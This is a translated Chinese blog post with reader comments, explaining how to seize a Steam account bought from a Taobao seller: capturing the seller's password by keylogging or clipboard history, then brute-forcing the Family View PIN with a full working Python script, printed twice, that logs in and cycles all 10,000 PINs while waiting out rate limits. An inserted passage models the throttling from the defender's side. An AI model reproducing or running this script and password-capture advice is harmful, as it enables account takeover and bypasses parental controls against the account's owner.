Brute-Forcing Steam Family View
卖女孩的小火柴
2020-01-04
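  • I bought a "Steam offline edition" of a game on Taobao. In practice the seller gives you an account, the game is downloaded and installed, and Steam is then run in offline mode. Together with a Steam account manager it plays quite well.
    But the Family View badge on the client kept bothering me...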

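    How do you get the account password?

    Many shops are unwilling to give you the account password. They would rather connect remotely, type in the account name and password, set everything up, and then switch the client to offline mode.
    This is actually easy to deal with. Steam's own protection is not very thorough: you can log keystrokes to capture the password as it is typed, and if you run into a shop that, like me, lazily copies and pastes, you only need to open Windows' built-in clipboard history (Win logo key + V) to see the copied account name and password.

    How do you get the Family View key?

    Both the Steam client and the Steam website are affected by Family View. In testing, both the client and the website pause input for 3 minutes after 5 wrong entries, so of course I chose to work against the website.
    Capturing the traffic is also simple. Note that one parameter is delivered embedded in the page and has to be extracted; then, when the error appears, pause for 3 minutes and continue.

    rsa.js.zip
    The script is below: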

    # !/user/bin/env python
    # -*- coding:utf-8 -*- 
    # time: 2018/9/6--19:24
    __author__ = 'Henry'
    # I use his login code ,thx him
    __sauthor__ = 'zponds'
    
    '''
    Steam login (RSA)
    URL:https://store.steampowered.com/login/
    '''
    
    import requests
    import time
    import re
    import execjs
    import json
    
    def steam_login():
        req = requests.session()
        headers = {
            'Referer': 'https://store.steampowered.com/login/',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
    Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
        }
        url = 'https://store.steampowered.com/login/getrsakey/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user
        }
        html = req.post(url, data=data, headers=headers).json()
        pub_mod = html.get('publickey_mod')
        pub_exp = html.get('publickey_exp')
        timestamp = html.get('timestamp')
    
        with open('rsa.js', encoding='utf-8') as f:
            jsdata = f.read()
        passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
        print(passencrypt)
        # login
        url = 'https://store.steampowered.com/login/dologin/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user,
            'password': passencrypt,
            'twofactorcode': '',
            'emailauth': '',
            'loginfriendlyname': '',
            'captchagid': '-1',
            'captcha_text': '',
            'emailsteamid': '',
            'rsatimestamp': timestamp,
            'remember_login': 'false',
        }
        html = req.post(url, data=data, headers=headers).json()
        if html.get('emailauth_needed') == True:
            print('Login requires your email verification code')
            emailid = html.get('emailsteamid')
            email = input('Please enter your email verification code:')
            # login again
            data['emailauth'] = email
            data['emailsteamid'] = emailid
            html = req.post(url, data=data, headers=headers).json()
            print(html)
            if html.get('login_complete') == True and html.get('success') == True:
                print('logining...')
                url_store = 'https://store.steampowered.com/'
                html = req.get(url_store, headers=headers).text
                username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
                print('[Success!Username:' + username + ']')
                r = req.get('https://store.steampowered.com/parental/blocked')
                if '/parental/unlock' in r.text:
                    print('The account has a family view')
                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                    success = False
                    start = input('PIN from:')
                    start_time = int(time.time())
                    for pin in range(int(start) - 1, 10000):
                        flag = True
                        while flag:
                            # Build the request using the extracted sessionID
                            pin_str = str(pin)
                            while len(pin_str) < 4:
                                pin_str = "0" + pin_str
                            data = {
                                'pin': pin_str,
                                'sessionid': sessionID
                            }
                            try:
                                r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                             headers=headers)
                                r_json = json.loads(r.text)
                                if r_json['success'] == False:
                                    if 'wait a while' in r_json['error_message']:
                                        print('Sleep...')
                                        time.sleep(180)
                                        r = req.get('https://store.steampowered.com/parental/blocked')
                                        sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                    else:
                                        flag = False
                                        print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                                else:
                                    print("PIN: %s: SUCCESS!" % pin_str)
                                    end_time = int(time.time())
                                    print("Time: %ds" % (end_time-start_time))
                                    success = True
                            except BaseException as e:
                                print('Error...')
                                time.sleep(10)
                            if success:
                                exit(0)
                    else:
                        print('The account does not have a family view')
            else:
                print('login fail...')
        elif html.get('success') == False and html.get('message') != '':
            print(html.get('message'))
            print('login fail...')
    
    
    if __name__ == '__main__':
        user = input('account:')
        password = input('password:')
        steam_login()

    PINs run from 0000 to 9999 and 5 can be tried every 3 minutes, so even with bad luck it is a matter of 2-3 days. Just leave it running on a server.
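
    The throttling described above (5 wrong entries, then a 3-minute pause, over 10,000 possible PINs) can be modelled from the service side to see how little it protects. The following is an added example, not part of the original post; the doubling lockout and its 24-hour cap are assumptions chosen for comparison, and request latency is ignored.

```python
# Added example (not from the original post): model of PIN-entry throttling.
# Page facts: 4-digit PIN (0000-9999), 5 wrong entries, then a 3-minute pause.
# The doubling policy and its 24-hour cap are assumptions for comparison.
KEYSPACE = 10_000
DAY = 86_400


def fixed(_lockouts, pause_s=180):
    """Policy described on the page: every lockout lasts 3 minutes."""
    return pause_s


def doubling(lockouts, base_s=180, cap_s=DAY):
    """Assumed alternative: each lockout doubles the previous one, up to cap_s."""
    return min(base_s * 2 ** min(lockouts, 32), cap_s)


def guesses_within(horizon_s, policy, per_window=5):
    """PIN entries an automated client can submit within horizon_s seconds.
    Request latency is ignored, so this is an upper bound."""
    t = guesses = lockouts = 0
    while True:
        guesses = min(guesses + per_window, KEYSPACE)
        if guesses == KEYSPACE:
            return guesses
        t += policy(lockouts)
        lockouts += 1
        if t > horizon_s:
            return guesses


def seconds_to_exhaust(policy, per_window=5):
    """Enforced waiting time before the last PIN in the keyspace has been tried."""
    lockouts = (KEYSPACE - 1) // per_window   # no pause follows the final entry
    return sum(policy(n) for n in range(lockouts))


def coverage(horizon_s, policy):
    """Chance that a uniformly random PIN falls inside what was tried."""
    return guesses_within(horizon_s, policy) / KEYSPACE


if __name__ == "__main__":
    for name, policy in (("fixed 3 min", fixed), ("doubling, 24 h cap", doubling)):
        print(f"{name:20s} exhaust: {seconds_to_exhaust(policy) / DAY:8.1f} days, "
              f"3-day coverage: {coverage(3 * DAY, policy):.2%}")
```

    With the fixed 3-minute pause the model gives about 4.2 days of enforced waiting to cover every PIN and roughly 72% coverage within 3 days; the assumed doubling lockout allows 55 entries in the same 3 days.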

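    After you have the key?

    Once Family View is removed you can add Family Sharing.
    From then on, the right to use the account is yours.

    What? You can't run Python?

    No problem, I have prepared a Windows version that works out of the box! It can be used directly after downloading!
    One guidance session is included as well!

    Updated March 18, 2020

    • Automatically tries to log in again after being disconnected
    • Asks for EXIT to be typed in order to quit when finished
    • Bug fixes
    • Of course, the compiled Windows file has been updated too
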
    # !/user/bin/env python
    # -*- coding:utf-8 -*- 
    # time: 2018/9/6--19:24
    __author__ = 'Henry'
    # I use his login code ,thx him
    __sauthor__ = 'zponds'
    
    '''
    Steam login (RSA)
    URL:https://store.steampowered.com/login/
    '''
    
    import requests
    import time
    import re
    import execjs
    import json
    
    def steam_login(open_start=-1):
        req = requests.session()
        headers = {
            'Referer': 'https://store.steampowered.com/login/',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
    Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
        }
        url = 'https://store.steampowered.com/login/getrsakey/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user
        }
        html = req.post(url, data=data, headers=headers).json()
        pub_mod = html.get('publickey_mod')
        pub_exp = html.get('publickey_exp')
        timestamp = html.get('timestamp')
    
        with open('rsa.js', encoding='utf-8') as f:
            jsdata = f.read()
        passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
        # print(passencrypt)
        # login
        url = 'https://store.steampowered.com/login/dologin/'
        data = {
            'donotcache': str(int(time.time() * 1000)),
            'username': user,
            'password': passencrypt,
            'twofactorcode': '',
            'emailauth': '',
            'loginfriendlyname': '',
            'captchagid': '-1',
            'captcha_text': '',
            'emailsteamid': '',
            'rsatimestamp': timestamp,
            'remember_login': 'true',
        }
        html = req.post(url, data=data, headers=headers).json()
        if html.get('emailauth_needed') == True:
            print('登陆需要邮箱验证码...')
            emailid = html.get('emailsteamid')
            email = input('请输入验证码:')
            # login again
            data['emailauth'] = email
            data['emailsteamid'] = emailid
            html = req.post(url, data=data, headers=headers).json()
            # print(html)
        if html.get('login_complete') == True and html.get('success') == True:
            print('logining...')
            url_store = 'https://store.steampowered.com/'
            html = req.get(url_store, headers=headers).text
            username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
            print('[登陆成功!用户名:' + username + ']')
            r = req.get('https://store.steampowered.com/parental/blocked')
            if '/parental/unlock' in r.text:
                print('这个账户存在家庭监护')
                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                success = False
                if open_start == -1:
                    start = input('从多少开始PIN(第一次运行请从0000开始):')
                else:
                    start = open_start
                start_time = int(time.time())
                for pin in range(int(start) - 1, 10000):
                    flag = True
                    while flag:
                        # Build the request using the extracted sessionID
                        pin_str = str(pin)
                        while len(pin_str) < 4:
                            pin_str = "0" + pin_str
                        data = {
                            'pin': pin_str,
                            'sessionid': sessionID
                        }
                        try:
                            r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                         headers=headers)
                            if len(r.text) > 2000:
                                return steam_login(pin)
                            r_json = json.loads(r.text)
                            if r_json['success'] == False:
                                if 'wait a while'  in r_json['error_message'] or '错误尝试' in r_json['error_message']:
                                    print('等待中...')
                                    time.sleep(180)
                                    r = req.get('https://store.steampowered.com/parental/blocked')
                                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                else:
                                    flag = False
                                    print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                            else:
                                print("PIN: %s: 成功!" % pin_str)
                                end_time = int(time.time())
                                print("Time: %ds" % (end_time-start_time))
                                success = True
                        except BaseException as e:
                            print('Error...')
                            time.sleep(10)
                        if success:
                            return
            else:
                print('您的账户不存在家庭监护!')
        else:
            print(html.get('message'))
            print('登陆失败...')
    
    
    if __name__ == '__main__':
        user = input('账户名:')
        password = input('密码:')
        print('注意,跑PIN耗时可能非常长...可能长达两天...')
        steam_login()
        end = input('输入 EXIT 以退出...')
        while end != 'EXIT':
            end = input('输入 EXIT 以退出...')

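    Author: 卖女孩的小火柴
    Article link: https://www.shinenet.cn/archives/82.html
    Last modified: 2020-03-18 16:26:38
    Unless marked as reposted, all articles on this site are original and licensed under CC BY-NC-SA 4.0; please credit the source when reposting. Thank you!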
    Comments
    55 comments so far
    xxxxmw
    2020-09-01 17:49
    Traceback (most recent call last):
      File "C:/Users/10564/Desktop/untitled/111.py", line 128, in <module>
        steam_login()
      File "C:/Users/10564/Desktop/untitled/111.py", line 36, in steam_login
        with open('rsa.js', encoding='utf-8') as f:
    FileNotFoundError: [Errno 2] No such file or directory: 'rsa.js'
    I'm really curious what on earth this rsa.js is
    xxxxmw
    2020-09-01 18:02
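    @卖女孩的小火柴 Boss, what does this rsa.js do??
    2020-09-01 18:04
    @xxxxmw It is used to generate the various values needed during Steam login; Steam login does not POST in plaintext
    xxxxmw
    2020-09-01 22:20
    @卖女孩的小火柴 Haha, thanks for clearing that up, boss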
    YSN
    2020-08-04 00:06
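    Sometimes there is no response for a long time, and I have to press Enter manually before it continues cracking
    2020-08-04 00:08
    @YSN Yes, it is a Windows terminal issue that has been around for a long time; Linux doesn't have this problem
    風也很溫柔
    2020-07-31 08:43
    Boss, could you set it up for me remotely over QQ? I don't understand it
    2020-07-31 09:03
    @風也很溫柔 Contact me on QQ: 1005468403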
    无恙丶
    2020-06-29 15:50
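    Login failed······· and then it says to exit. How do I deal with this?
    无恙丶
    2020-06-29 15:52
    @无恙丶 It works now. Thanks. I misread it.
    欧阳逸龙
    2020-06-10 14:22
    Can it be done without the web page?
    2020-06-10 14:23
    @欧阳逸龙 No, I don't know how to do the Steam client's login algorithm
    欧阳逸龙
    2020-06-10 14:27
    @卖女孩的小火柴 Will any browser do?
    2020-06-10 14:28
    @欧阳逸龙 What does it have to do with the browser...
    This was done by reverse engineering the front end directly and simulating a browser
    欧阳逸龙
    2020-06-10 14:31
    @欧阳逸龙 OK, please accept my QQ request
    2020-06-10 14:36
    @欧阳逸龙 Your account has been risk-flagged by Tencent, so I can't accept it
    Add me from a different account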